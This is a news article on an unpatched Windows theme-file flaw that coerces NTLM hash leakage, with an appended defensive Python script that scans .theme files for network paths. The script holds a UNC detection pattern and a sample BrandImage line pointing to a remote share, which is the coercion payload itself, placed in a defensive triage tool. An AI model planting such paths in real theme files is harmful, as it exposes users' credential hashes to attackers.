All versions of Windows clients, from Windows 7 through current Windows 11 versions, contain a 0-day vulnerability that could allow attackers to capture NTLM authentication hashes from users of affected systems.
Researchers at ACROS Security reported the flaw to Microsoft this week. They discovered the issue while writing a patch for older Windows systems for CVE-2024-38030, a medium-severity Windows Themes spoofing vulnerability that Microsoft mitigated in its July security update.
Variant of Two Earlier Vulnerabilities
The vulnerability that ACROS discovered is similar to CVE-2024-38030 and permits what is known as an authentication coercion attack, where a vulnerable device is essentially coerced into sending NTLM hashes — the cryptographic representation of a user's password — to an attacker's system. Akamai researcher Tomer Peled discovered CVE-2024-38030 while analyzing Microsoft's fix for CVE-2024-21320, another, earlier Windows themes spoofing vulnerability he discovered and reported to Microsoft. The flaw that ACROS uncovered is a new, separate vulnerability related to the two flaws Peled reported earlier.
Windows theme files allow users to customize the appearance of their Windows desktop interface via wallpapers, screen savers, colors, and sounds. Both of the vulnerabilities that Akamai researcher Peled discovered had to do with the manner in which the themes handled file paths to a few image resources, specifically "BrandImage" or "Wallpaper." Peled found that because of improper validation, an attacker could manipulate the legitimate path to these resources in such a way as to get Windows to automatically send an authenticated request, including the user's NTLM hash, to the attacker's device.
As Peled explains to Dark Reading, "The themes file format is an .ini file, with multiple 'key,value' pairs. I initially found two key,value pairs that could accept file paths," he says.
The original vulnerability (CVE-2024-21320) stemmed from the fact that the key,value pairs accepted UNC paths — a standardized format for identifying network resources like shared files and folders — for network drives, Peled notes. "This [meant] that a weaponized theme file, with a UNC path, could trigger an outbound connection with user authentication, without them knowing." Microsoft fixed the issue by adding a check on the file path to ensure it wasn't a UNC path. But, Peled says, the function Microsoft used for this validation allowed for some bypasses, which is what led to Peled's discovery of the second vulnerability (CVE-2024-38030).
Microsoft Will Act 'As Needed'
What ACROS Security reported this week is the third Windows themes spoofing vulnerability rooted in the same file path issue. "Our researchers discovered the vulnerability in early October while writing a patch for CVE-2024-38030 meant for legacy Windows systems many of our customers are still using," says Mitja Kolsek, CEO of ACROS Security. "We reported this issue to Microsoft [on] Oct. 28, 2024, but we didn't release details or a proof-of-concept, which we plan to do after Microsoft has made their own patch publicly available."
A Microsoft spokesman said via email that the company is aware of the ACROS report and "will take action as needed to help keep customers protected." The company doesn't appear to have issued a CVE, or vulnerability identifier, for the new issue yet.
Like the two earlier Windows themes spoofing vulnerabilities that Akamai discovered, the new one that ACROS found also doesn't require an attacker to have any special privileges. "But they need to somehow get the user to copy a theme file to some folder on their computer, then open that folder with Windows Explorer using a view that renders icons," Kolsek says. "The file could also be automatically downloaded to their Downloads folder while visiting [an] attacker's website, in which case the attacker needs to wait for the user to view the Downloads folder at a later time."
Kolsek recommends that organizations disable NTLM where possible, but acknowledges that doing so could cause functional problems if any network components rely on it. "[An] attacker could only successfully target a computer where NTLM is enabled," he says. "Another requirement is that a request initiated by a malicious theme file would be able to reach the attacker's server on the Internet or in an adjacent network," something that firewalls should usually block, he says. As a result, an attacker is more likely to try to exploit the flaw in a targeted campaign than in a mass exploit.
Akamai's Peled says it's hard to know what ACROS's vulnerability is about without having access to the technical details. "But it might be another UNC bypass that circumvents the check, or it could be a different key,value pair that was missed in the original patching," he says. "UNC path formats are very complex and allow for weird combinations, which make detecting them very hard. This might be why it's so complex to fix."
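The two points made above, that theme files are plain .ini files whose "BrandImage" and "Wallpaper" keys can carry a file path, and that UNC paths come in enough spellings to make a single prefix check unreliable, can be illustrated with a small defender-side triage script. The following is an added example, not code from Microsoft, Akamai or ACROS, and it is not the validation function Microsoft shipped. It assumes the standard .theme INI layout (the `[Theme]` and `[Control Panel\Desktop]` section names are taken from that format, the two key names from the article) and uses a constructed sample theme with a documentation-range IP address. It flags any of those keys whose value is written in one of several network-path forms, so that a theme file pulled from a download folder or mail quarantine can be checked before anyone browses to it in Explorer.

```python
import configparser
import re
from typing import List, Tuple

# Keys the article names as holding a path to an image resource.
PATH_KEYS = {"brandimage", "wallpaper"}

# Several spellings of a network path. Listing them is the point: a check that only
# looks for a leading "\\" misses the others. \\?\UNC\host\share and \\.\UNC\... begin
# with two backslashes and so are caught by the first alternative. Extended-length
# local paths (\\?\C:\...) are flagged too; for triage a false positive is preferable
# to a miss, and the finding is reviewed by a person.
_UNC_RE = re.compile(
    r"""^\s*["']?(
        [\\/]{2}            # \\host\share, //host/share, \/host/share
      | (file|smb)://       # URL forms that also resolve to a remote host
    )""",
    re.IGNORECASE | re.VERBOSE,
)


def is_unc_path(value: str) -> bool:
    """True if the value is written as a network (UNC-style) path."""
    return _UNC_RE.match(value) is not None


def scan_theme(theme_text: str) -> List[Tuple[str, str, str]]:
    """Return (section, key, value) for every image-path key whose value is a network path."""
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    parser.optionxform = str  # keep key case exactly as written in the file
    parser.read_string(theme_text)
    findings = []
    for section in parser.sections():
        for key, value in parser.items(section):
            if key.lower() in PATH_KEYS and is_unc_path(value):
                findings.append((section, key, value))
    return findings


# Constructed sample (not a real theme file). 203.0.113.5 is a documentation address.
SAMPLE_THEME = r"""
[Theme]
DisplayName=Constructed sample theme (not a real file)
BrandImage=\\203.0.113.5\share\brand.png

[Control Panel\Desktop]
Wallpaper=C:\Windows\Web\Wallpaper\Windows\img0.jpg
"""

if __name__ == "__main__":
    for section, key, value in scan_theme(SAMPLE_THEME):
        print(f"[{section}] {key} points to a network path: {value}")
```

Run against a real .theme file, read its text and pass it to `scan_theme`; a hit means the file would make Explorer reach out to a remote host when it renders the theme, which is exactly the behaviour the NTLM mitigations and egress firewall rules quoted above are meant to stop.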